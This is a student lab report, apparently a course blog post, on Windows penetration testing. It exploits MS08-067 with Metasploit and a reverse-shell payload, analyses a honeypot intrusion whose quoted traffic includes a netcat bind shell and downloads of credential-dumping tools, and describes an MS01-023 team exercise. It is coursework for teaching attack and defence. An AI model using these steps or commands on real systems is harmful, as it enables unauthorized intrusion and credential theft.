20232925 2023-2024-2 《网络攻防实践》实践六次报告

20232925操昕

于 2024-04-19 22:44:39 发布

阅读量1k

点赞数 30

文章标签：网络

本文链接：https://blog.csdn.net/caoxincb/article/details/137924146

版权

20232925 2023-2024-2 《网络攻防实践》实践六次报告

1.实践内容

（1）动手实践Metasploit windows attacker

任务：使用metasploit软件进行windows远程渗透统计实验

具体任务内容：使用windows Attacker/BT4攻击机尝试对windows Metasploitable靶机上的MS08-067漏洞进行远程渗透攻击，获取目标主机的访问权

（2）取证分析实践：解码一次成功的NT系统破解攻击。

来自212.116.251.162的攻击者成功攻陷了一台由rfp部署的蜜罐主机172.16.1.106,(主机名为lab.wiretrip.net)，要求提取并分析攻击的全部过程。
攻击者使用了什么破解工具进行攻击
攻击者如何使用这个破解工具进入并控制了系统
攻击者获得系统访问权限后做了什么
我们如何防止这样的攻击
你觉得攻击者是否警觉了他的目标是一台蜜罐主机？如果是，为什么
（3）团队对抗实践：windows系统远程渗透攻击和分析。

攻方使用metasploit选择漏洞进行攻击，获得控制权。（要求写出攻击方的同学信息、使用漏洞、相关IP地址等）

防守方使用wireshark监听获得的网络数据包，分析攻击过程，获取相关信息。

2.实践过程

2.1动手实践Metasploit windows attacker

查看攻击机Kali的IP为192.168.200.2，靶机Win2Server的IP为192.168.200.42。首先确保攻击机和靶机之间能连通，这里重新配置了Win2Server，放到了和Kali同一个网段中。如图一所示，kali能ping到Win2Server。
在这里插入图片描述

图一

通过msfconsole进入Metasploit ，然后再输入search MS08_067可以查看查看MS08_067漏洞的相关信息，如图二所示。
在这里插入图片描述

图二

可以看到exploit/windows/smb/ms08_067_netapi，这是可以使用的攻击脚。然后下面的是默认攻击载荷。如图三所示。
在这里插入图片描述

图三

如图四，使用show options查看需要设置的参数。
在这里插入图片描述

图四

通过设置IP，set RHOST 192.168.200.42，将靶机改为win2Server，set LHOST 192.168.13.8设置攻击机为kali，然后再次查看配置，如图五所示，配置成功。
在这里插入图片描述

图五

利用exploit执行，但是如图六所示，提示会话关闭，连接失败。
在这里插入图片描述

图六

然后尝试使用别的攻击载荷。使用show payloads显示可用的攻击负载，set payload更改攻击载荷为generic/shell_reverse_tcp。如图七。
在这里插入图片描述

图七

再次exploit执行，会话成功，进入C盘创建一个文件夹为newfile。如图八所所示。
在这里插入图片描述

图八

然后回到靶机win2Server,如图九可见C盘有个文件夹newfile。
在这里插入图片描述

图九

2.2取证分析实践

在学习通下载snort-0204@0117文件，在wireshark中打开。依据被攻击机IP通过ip.dst ==172.16.1.106 and http筛选数据包查看，结果如图十所示。
在这里插入图片描述

图十

然后，发现序号117的报文包含特殊字符，右键点击跟踪它的数据流，特殊字符%C0%AF为Unicode编码，是为了获取boot.ini文件，如图十一。
在这里插入图片描述

图十一

继续跟踪数据流分析，然后发现在有的数据流中有"ADM!ROX!YOUR!WORLD"，通过查询发现“ADM!ROX!YOUR!WORLD”是msadc2.pl工具发起的攻击，可见这是RDS漏洞渗透攻击，攻击者可以远程执行用户系统的命令并运行。流量中的cmd命令也证实如此。如图十二所示。
在这里插入图片描述

图十二

然后继续追踪数据流，在1103发现有用户名请求，向后继续追踪在1107的数据流发现连接FPT服务器的一些信息，攻击者下载了nc.exe，pdump.exe和samdump.exe。如图十三。
在这里插入图片描述

图十三

继续追踪，在1233报文发现攻击者执行了命令cmd1.exe?/c+nc±l±p+6969±e+cmd1.exe。如图十四所示，表示攻击者连接上了靶机6969端口获取了访问权限。
在这里插入图片描述

图十四

攻击者通过6969端口获取权限，所以以tcp.port == 6969作为过滤条件，查看获取权限后的操作，继续追踪序号1282的tcp流，如图十五所示，可以判断攻击者进行了账户提权以及创建文件等等。
在这里插入图片描述
我们如何防止这样的攻击？
对于系统漏洞一般会及时发布系统补丁，所以要及时更新系统补丁。此外一些不必要开放的端口不要开放。然后安装系统文件也不要放在默认路径。
如图十五所示，攻击者已经警觉了他的目标是一台蜜罐主机，并做下了留言。
在这里插入图片描述

图十五

2.3团队对抗实践

攻击：
攻击方：操昕 kali(192.168.1.53)
防守方：陈瀚文 win2Server(192.168.1.135)

作为攻击方利用MS01_023漏洞,ISAPI 扩展中未经检查的缓冲区可能会危害 IIS 5.0 服务器。
Windows 2000 引入了对 Internet 打印协议 (IPP) 的本机支持，这是一种用于通过 HTTP 提交和控制打印作业的行业标准协议。该协议在 Windows 2000 中通过 ISAPI 扩展实现，该扩展默认安装为 Windows 2000 的一部分，但只能通过 IIS 5.0 访问。
由于 ISAPI 扩展在处理输入参数的代码部分中包含未经检查的缓冲区，因此会产生安全漏洞。这可能使远程攻击者能够进行缓冲区溢出攻击，并导致选择的代码在服务器上运行。

首先是查找漏洞然后配置选项，如图十六所示。
在这里插入图片描述

图十六

然后执行，获取权限后在靶机上使用ipconfig查看IP信息如图十七。

图十七

防守：
防守方：操昕 win2Server(192.168.1.131)
攻击方：陈瀚文 kali(192.168.1.230)
攻击方式用的是缓冲区溢出任意代码执行相关漏洞。
使用wireshark抓取攻击的流量包，如图十八所示。
在这里插入图片描述

图十八然后追踪数据流，发现主要有俩个流是关于攻击者192.168.1.230的，也是它的攻击过程。如图十九所示，这里是一堆二进制命令，然后在图二十已经获取了权限，并输入了ipconfig。所以判断是利用缓冲区溢出执行了自己上传的代码。 ![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/1e033cfb22b94cdb979a95db933da611.png) 图十九 ![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/d8200de23cb94118b5eee6c60f649419.png) 图二十